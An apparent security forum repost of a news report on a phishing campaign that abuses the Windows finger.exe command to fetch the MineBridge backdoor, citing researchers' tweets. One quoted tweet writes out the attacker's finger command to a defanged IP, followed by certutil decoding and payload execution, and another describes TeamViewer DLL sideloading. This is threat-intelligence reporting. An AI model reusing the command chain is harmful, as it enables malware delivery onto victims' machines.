Windows Finger command abused by phishing to download malware


Level 69
Content Creator
Malware Hunter
Aug 17, 2014
Attackers are using the normally harmless Windows Finger command to download and install a malicious backdoor on victims' devices.
The 'Finger' command is a utility that originated in Linux/Unix operating systems that allows a local user to retrieve a list of users on a remote machine or information about a particular remote user. In addition to Linux, Windows includes a finger.exe command that performs the same functionality.
This week, security researcher Kirk Sayre found a phishing campaign utilizing the Finger command to download the MineBridge backdoor malware.
VirusTotal ITW maldoc using finger.exe to download 2nd stage. Runs 'finger nc20@184[.]164[.]146[.]102' to pull down b64 encoded cert, certutil to decode, runs payload. Payload is VirusTotal.
— Kirk Sayre (@bigmacjpg) January 14, 2021
Once executed, the downloader will download a TeamViewer executable and use DLL hijacking to sideload a malicious DLL, the MineBridge malware.
Interesting, downloads a teamviewer executable and a malicious dll, sideloaded by teamviewer, containing MINEBRIDGE malware - The behaviour is the same, apart from the finger.exe, even the TLD c2 *.top of fireeye report - STOMP 2 DIS: Brilliance in the (Visual) BasicsVirusTotal
— Giuseppe `N3mes1s` (@gN3mes1s) January 15, 2021